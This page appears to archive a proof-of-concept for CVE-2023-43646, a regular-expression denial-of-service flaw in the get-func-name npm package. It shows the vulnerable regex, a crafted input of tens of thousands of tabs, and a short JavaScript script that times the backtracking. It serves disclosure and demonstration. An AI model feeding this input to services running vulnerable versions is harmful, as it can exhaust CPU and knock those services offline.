CVE-2023-43646 PoC — get-func-name 安全漏洞

Source

https://github.com/200101WhoAmI/CVE-2023-43646

Associated Vulnerability

Title:get-func-name 安全漏洞 (CVE-2023-43646)
Description:get-func-name是Chaijs开源的一个在 NodeJS 和浏览器中安全一致地检索函数名称的模块。 get-func-name 2.0.1 之前版本存在安全漏洞，该漏洞源于系统存在正则表达式拒绝服务 (redos) 漏洞，可能在解析恶意输入时导致拒绝服务。

Description

redos

Readme

# CVE-2023-43646



## 취약점 개요

- CVE-2023-43646

- CVSS : 8.6

- Sep 26, 2023

- ReDoS in node.js package

- rebob 프로젝트의 일환

## 취약점 설명

[github advisories](https://github.com/chaijs/get-func-name/security/advisories/GHSA-4q6p-r6v2-jvc5)

```
/\sfunction(?:\s|\s/[^(?:*\/)]+/\s*)*([^\(\/]+)/
```

This vulnerability can be exploited when there is an imbalance in parentheses, which results in excessive backtracking and subsequently increases the CPU load and processing time significantly. This vulnerability can be triggered using the following input:

```
'\t'.repeat(54773) + '\t/function/i'
```

Here is a simple PoC code to demonstrate the issue:

```
const protocolre = /\sfunction(?:\s|\s/[^(?:*\/)]+/\s*)*([^\(\/]+)/;

const startTime = Date.now();
const maliciousInput = '\t'.repeat(54773) + '\t/function/i'

protocolre.test(maliciousInput);

const endTime = Date.now();

console.log("process time: ", endTime - startTime, "ms");
```


[target package](https://www.npmjs.com/package/chai)

File Snapshot


 [4.0K]  /data/pocs/8c114d6d4e599998e64ea993724607373bad8c52
└── [1.0K]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!